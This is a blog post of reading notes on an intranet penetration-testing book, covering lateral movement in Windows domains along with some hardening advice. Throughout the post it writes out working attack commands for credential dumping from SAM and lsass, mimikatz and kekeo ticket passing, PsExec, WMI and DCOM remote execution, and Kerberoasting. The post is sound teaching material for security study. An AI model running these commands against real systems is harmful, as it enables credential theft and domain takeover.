"Intranet Security Offense and Defense: A Practical Guide to Penetration Testing" Reading Notes (5): Analysis and Defense of Lateral Movement in the Domain

Language 2022-04-20 12:47:24 views: null

content

foreword

In this article, continue to read and learn "Intranet Security Attack and Defense: Penetration Testing Practical Guide". This chapter systematically introduces the main methods of lateral movement in the domain, reproduces and analyzes the most important and classic vulnerabilities in the intranet domain, and gives corresponding preventive measures

This chapter includes:

  • Analysis of common remote connection methods
  • Understanding the NTLM protocol from a cryptographic perspective
  • Principles of PTT and PTH
  • How to use PsExec, WMI, smbexec for lateral movement
  • Authentication process of Kerberos protocol
  • Windows Authentication Hardening Solution
  • Exchange Mail Server Penetration Testing

I have also learned some things before: Intranet penetration series: Summary of lateral penetration methods

1. Common Windows Remote Connections and Commands

1、IPC

IPC (Internet Process Connection) is a named pipe opened for inter-process communication

  • The corresponding permissions can be obtained by verifying the user name and password
  • You can establish a connection with the target machine through ipc$, and use this connection to run commands on the target machine

create an ipc$

net use \\192.168.1.10\ipc$ "admin123" /user:administrator

(1) Conditions of use

  • Open ports 139 and 445
  • The administrator has enabled default sharing

(2) Reasons for connection failure

  • wrong user name or password
  • The target does not have the ipc$ default share open
  • Unable to successfully connect to ports 139 and 445 of the target
  • wrong command input

2. Windows comes with tools

(1)dir

After using the net usecommand to establish ipc$ with the remote target machine, you can use the dir command to list the files in the remote host

dir \\192.168.1.10\c$

(2)tasklist

After using the net usecommand to establish ipc$ with the remote target machine, you can use the tasklist command to list the processes running on the remote host

tasklist /S 192.168.1.10 /U administrator /P admin123

3. Schedule tasks

(1)at

Scheduled task command before Windows server 2008

//创建计划任务定时执行shell
at \\192.168.1.10 4:11PM C:\shell.bat
// 创建之后会有一个任务ID,指定任务ID可以删除
at \\192.168.1.10 7 /delete

(2)schtasks

Scheduled task command after Windows server 2008

//开机自启
schtasks /create /s 192.168.1.10 /tn test /sc onstart /tr C:\calc.bat /ru system /f
//执行
schtasks /run /s 192.168.1.10 /i /tn "test"
//删除任务
schtasks /delete /s 192.168.1.10 /tn "test" /f

Second, Windows system hash value acquisition

1、LM Hash和NTLM Hash

There are two methods for encrypting plaintext passwords in Windows:

  • LM Hash: "LAN Manager Hash", which is essentially DES encryption, or a hard-coded key, limited to 14 bits (0 is added if it is insufficient). Disabled by default since Windows Vista and Windows Server 2008, the LM Hash at this time is aad3b435b51404eeaad3b435b51404ee(represented as empty or disabled)
  • NTLM Hash: "New Technology LM Hash", MD4 encryption, used after Windows Vista and Windows Server 2003

Hash can be cracked through online databases, rainbow tables, etc., or PTH (Pass the Hash) can be used for lateral penetration

2. Stand-alone password capture

A tool can be used to export the hash value and clear text password from the lsass.exe process in memory or from a SAM file

  • The local user name, hash value and other security verification information are stored in the SAM file, the location where the SAM file is saved C:\Windows\System32\config, this file is not allowed to be copied, but you can use a U disk to enter the PE system for copying
  • The lsass.exe process is used to implement Windows' local security policy and login policy

To grab hashed or plaintext passwords in Windows operating systems, privileges must be elevated to System

(1) Grab

Export the SAM file and system file, and then read the hash from the file through mimikatz or Cain

reg save hklm\sam sam.hive
reg save hklm'system system.hive

Use Task Manager or Microsoft's Procdump to export the lsass.dmp file, and use mimikatz to get the hash from the memory file

Procdump download address: https://docs.microsoft.com/zh-cn/sysinternals/downloads/procdump

Some tools:

  • GetPassword
  • PwDump7
  • QuarksPwDump
  • mimikatz
  • PowerShell

(2) Prevention

Windows Server 2012 turns off WDigest by default, making it impossible for attackers to get plaintext passwords from memory

For versions below 2012, if you install the KB2871997 patch, the same effect

The status of the WDigest function can be viewed and modified in the registry. The opening and closing in the command line are as follows

insert image description here

3、Hashcat

Hashcat only supports CPU cracking; oclHashcat supports GPU cracking (AMD, NIVDA), supports cracking Windows passwords, Linux passwords, Office passwords, Wi-Fi passwords, MySQL passwords, SQL Server passwords, and international mainstream encryption by MD5, SHA1, SHA256, etc. Algorithm encrypted password

Download address: https://github.com/hashcat/hashcat

4. Prevention

Precautions:

  • Windows Server 2012 R2 added a new group called Protected Users. As long as users who need to be protected are placed in this group, attackers cannot use tools such as mimikatz to grab plaintext passwords and hash values.

  • Install KB2871997the patch, which is used by Microsoft to solve the problem of PsExec or IPC remote viewing (c$), so that the local account is no longer allowed to remotely access the computer system, but the local administrator account with SID=500 (default Administrator) except

  • Microsoft added a protocol called WDigest to Windows XP, which enables Windows to store plaintext passwords in memory to facilitate users logging on to the local computer. Modify the registry so that it no longer does this

  • Determines which users can attach the debugger to any process or kernel based on Debug privileges, by default only Administrator. mimikatz requires Debug privileges when grabbing hashed or plaintext passwords (because mimikatz needs to interact with the lsass process). Remove Administrator from Debug group

3. Pass-the-Hash Attack

Pass the Hash (Pass the Hash) attack:

  • In a domain environment, users mostly use domain accounts to log in to computers, and a large number of computers use the same local administrator account and password during installation.
  • Therefore, if the computer's local administrator account and password are also the same, the attacker can use the pass-the-hash attack to log in to other computers in the intranet.

To put it bluntly, it is to use tools to pass the hash value to other computers, perform authorization verification, and realize control of remote computers.

In the actual test, the KB287l997conventional hash transfer method cannot be used for lateral movement after the update, except for the Administrator account (SID is 500) - the hash value of this account can still be used for hash transfer. It should be emphasized that the SID is 500 account (even if the Administrator account is renamed, it will not affect the SID value)

4. Ticket Passing Attack

Pass the Ticket (PTT) does not require local administrator privileges

1、mimikatz

//导出票据
mimikatz "privilege::debug" "sekurlsa::tickets /export"
//清除内存中的票据
mimikatz # kerberos::purge
//将票据注入内存
mimikatz "kerberos::ptt" "C:\ticket\<票据文件名>"

2 、 kekeo

kekeo needs to use the domain name, user name, and NTLM Hash to generate tickets together

Download address: https://github.com/gentilkiwi/kekeo

//生成票据
kekeo "tft::ask /user:administrator /domin:test.com /nltm:<nltm hash 值>"
//清除内存中其他票据
kekeo # kerberos::pruge
//导入内存
kerberos:: ptt <票据文件名>

3. Prevention

A few points:

  • When using the dir command, you must use a hostname (using an IP address will cause an error)
  • The default valid time for the ticket file to be injected into the memory is 10 hours
  • Ticket passing does not require local administrator privileges on the target machine

5. PsExec

PsExec is the software in Microsoft's official PsTools toolkit

  • At the beginning of the period, it was mainly used for the operation and maintenance of a large number of Windows hosts, and the effect was very good in the domain environment.
  • With PsExec, you can execute commands on a remote computer or elevate administrator privileges to System privileges to run specified programs
  • Can be used on Windows server 2016 and earlier
  • Download address: https://download.sysinternals.com/files/PSTools.zip

The basic principle of PsExec is to create a psexec service on the remote target computer through a pipeline, and generate a binary file named "PSEXECSVC" in the local disk, then run the command through the psexec service, and delete the task after the operation is completed.

Requires the remote system to enable admin$sharing (it is enabled by default), which will generate a lot of logs

//获取system权限shell(已建立ipc$),不用-s的话获得的是administrator权限
PsExec.exe -accepteula \\192.168.1.10 -s cmd.exe
//如果没有ipc$
PsExec.exe \\192.168.1.10 -u administrator -p 123456 cmd.exe

6. WMI

WMI (Windows Management Instrumentation) is a series of tool integration

  • Supported since Windows 98
  • Computer systems can be managed locally or remotely
  • Windows does not log WMI operations by default when using wmiexec for lateral movement

1. Basic commands

Basic implementation:

wmic /node:192.168.1.10 /user:administrator /password:admin123 process call create "cmd.exe" /c ipconfig > ip.txt"

Use wmic to remotely execute commands and start the Windows Management Instrumentation service on the remote system (the target server needs to open port 135, and wmic will execute commands on the remote system with administrator privileges ). If the server has a firewall turned on, wmic will not be able to connect. In addition, if there is no echo of the wmic command, you can output the command result to a file, and use ipc$ and type to read the information. If wmic executes a malicious program, it will not leave a log

2. Other tools

(1) wmiexec in impacket

Download impacket in kali

  • After a successful connection there will be an interactive command line
  • Mainly used in linux->windows
wmiexec.py administrator:[email protected]

(2)wmiexec.vbs

wmiexec.vbs calls WMI through VBS to simulate the function of PsExec (it has long been killed and blocked)

//shell
cscript.exe //nologo wmiexec.vbs /shell 192.168.1.10 administrator admin123
//执行单条命令
cscript.exe wmiexec.vbs /cmd 192.168.1.10 administrator admin123 "ipconfig"

(3)Invoke-WMICommand

Invoke-WMICommand is a script in PowerSpolit that invokes WMI via PowerShell to execute commands remotely

//目标用户名
$user = "test\administrator"
//目标密码
$password = ConverTo-SecureString -String "admin123" -AsPlainText -Force
//整合
$Cred = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList $user, $password
//远程执行
$remote = Invoke-WmiCommand -Payload {
    
    ipconfig} -Credential $Cred -ComputerName 192.168.1.10
//输出
$remote.PayloadOutput

(4)Invoke-WMIMethod

Invoke-WMIMethod comes with powershell

//目标用户名
$user = "test\administrator"
//目标密码
$password = ConverTo-SecureString -String "admin123" -AsPlainText -Force
//整合
$Cred = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList $user, $password
//远程执行
Invoke-WMIMethod -Class Win32_Process -Name Create -ArgumentList "ipconfig" -ComputerName "192.168.1.10" -Credential $Cred

Seven, smbexec

smbexec can execute commands on remote systems via file shares (admin$, c$, ipc$, d$)

download link:

Introduce how to use

Eight, the use of DCOM in remote systems

DCOM (Distributed Component Object Model, Distributed Component Object Model) is a series of concepts and program interfaces of Microsoft

  • Based on the Component Object Model (COM), COM provides a set of interfaces that allow communication between clients and servers on the same computer (Win95 and later)
  • A client program object can send requests to a server program object on another computer in the network

The execution process is the same:

  • Connect to a remote computer via ipc$
  • Excuting an order

1. Execute commands through local DCOM

Get a list of DCOM programs:

// Get-CimInstance在PowerShell 3.0上才有,即server2012及以上
Get-CimInstance Win32_DCOMApplication
// PowerShell 2.0可以用如下命令代替
Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_DCOMApplication

2. Use DCOM to execute commands on a remote machine

(1) Call MMC20.Application to remotely execute commands

net use \\192.168.1.10 "admin123" /user:test\xiaom
$com = [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application","192.168.1.10"))
$com.Document.ActiveView.ExecuteShellCommand('cmd.exe',$null,"/c cmd.exe","")

(2) Call 9BA05972-F6A8-11CF-A442-00A0C90A8F39

$com = [Type]::GetTypeFromCLSID('9BA05972-F6A8-11CF-A442-00A0C90A8F39',"192.168.1.10")
$obj = [System.Activator]::CreateInstance($com)
$item = $obj.item()
$item.Document.Application.ShellExecute("cmd.exe","/c calc.exe","c:\windows\system32",$null,0)关于这个方法的详细内容可以参考文章:https://bbs.pediy.com/thread-226540-1.htm

9. Application of SPN in Domain Environment

Service Principal Name (SPN)

  • A large number of applications contain a variety of resources
  • Each resource is assigned a different SPN

1. SPN scan

Because each server in the domain environment needs to register the SPN in the Kerberos authentication service, the attacker will directly send a query request to the domain controller to obtain the SPN of the service it needs, so as to know where the service resources it needs to use are. on the machine .

Also known as "scanning Kerberos service instance names", SPN scanning is the best way to discover services in Active Directory . Compared with network port scanning, the main feature of SPN scanning is that it does not need to check service ports by connecting every IP address in the network (it will not generate a large number of warning logs due to triggering rules for IPS, IDS and other devices in the intranet). ). Because the SPN query is part of the Kerberos ticket behavior, it is more difficult to detect.

insert image description here
The PowerShell-AD-Recon toolkit provides a series of services and the correspondence between the service login account and the host running the service. Download address: https://github.com/PyroTek3/PowerShell-AD-Recon

The SPN is queried to the domain controller through the LDAP protocol, so the attacker can scan the SPN as long as he obtains a common domain user authority .

2. Kerberoast attack

Download address: https://github.com/nidem/kerberoast

For details, please refer to: Intranet Penetration | SPN and Kerberoast Attack Explanation

Also related to this is the article Understanding Gold Notes and Silver Notes

defense:

  • Make sure the service account password is longer than 25 characters
  • Ensure randomness of passwords (avoid the same)
  • Change your password regularly

Ten, Exchange mail server security

The email may contain a large amount of source code, corporate internal address book, plaintext passwords, sensitive business login addresses, and VPN account passwords that can access the internal network from the external network.

Exchange supports PowerShell to operate it locally or remotely.

Mailbox server, Client Access server, and Hub Transport server are the core roles. As long as these three roles are deployed, they can provide basic email processing functions, and these three can be deployed on the same host.

Mail sending uses a unified communication protocol, namely SMTP (Simple Mail Transfer Protocol); mail receiving uses a variety of protocol standards, such as POP3 developed from POP (Post Office Protocol), and the more widely used IMAP (Internet Mail Access Protocol). protocol). Exchange developed a proprietary MAPI protocol for receiving mail

Access interfaces and protocols supported by Exchange:

  • OWA (Outlook Web App): Web mailboxes provided by Exchange
  • EAC (Exchange Administrative Center): Exchange Administrative Center, background
  • Outlook Anywhere(RPC-over-HTTP,RPC/HTTP)
  • MAPI(MAPI-over-HTTP,MAPI/HTTP)
  • Exchange ActiveSync(EAS,XML/HTTP)
  • Exchange Web Service(EWS,SOAP-over-HTTP)

Exchange service discovery:

  • Based on port scan discovery (nmap)
  • SPN lookup (SPN is registered in AD when Exchange is installed)

The suffix of the Exchange database is ".edb", which is stored on the Exchange server. You can use PowerShell to view the corresponding information

Exchange mail has a file suffix of ".pst"

UNC (Universal Naming Convention, Universal Naming Convention, also known as Universal Naming Convention, Universal Naming Convention). Similar to \\hostname\sharename, \\ip\address\sharenamethe network path is the UNC path, sharename is the network share name

View mail database

//查询之前需要安装命令
add-pssnapin microsoft.exchange *
Get-MailboxDatabase -server "Exchange1"
Get-MailboxDatabase -Identity 'Mailbox Database 1894576043' | Format-List Name,EdbFilePath,LogFolderPath

Epilogue

Some classic lateral movement methods
, many have been killed already

Guess you like

Origin blog.csdn.net/weixin_44604541/article/details/124146818
Recommended
Ranking
#2019110700005
What materials and procedures are required for patent transfer
What is the blockchain Ethereum triplet state root transaction root receipt root
Front-end study notes 04 --- About the insertion of html pictures and videos
Documents required for the filing of WeChat Mini Programs in special industries, the filing process of WeChat Mini Programs in special industries, how to file WeChat Mini Programs in special industries
2017 Qingdao-site tournament I The Squared Mosquito Coil
[BZOJ3165][HEOI2013]Segment (line segment tree without marking)
Kettle series: KettleEasyExpand, an open source Kettle universal plugin by Ma Jinju
The latest tutorial on making framework for iOS
DAX Section 6: Statistical Functions
Daily
More
2024-05-14(9)
2024-05-13(8)
2024-05-12(28)
2024-05-11(32)
2024-05-10(34)
2024-05-09(32)
2024-05-08(18)
2024-05-07(34)
2024-05-06(6)
2024-05-05(0)

Code World

© 2018 codetd.com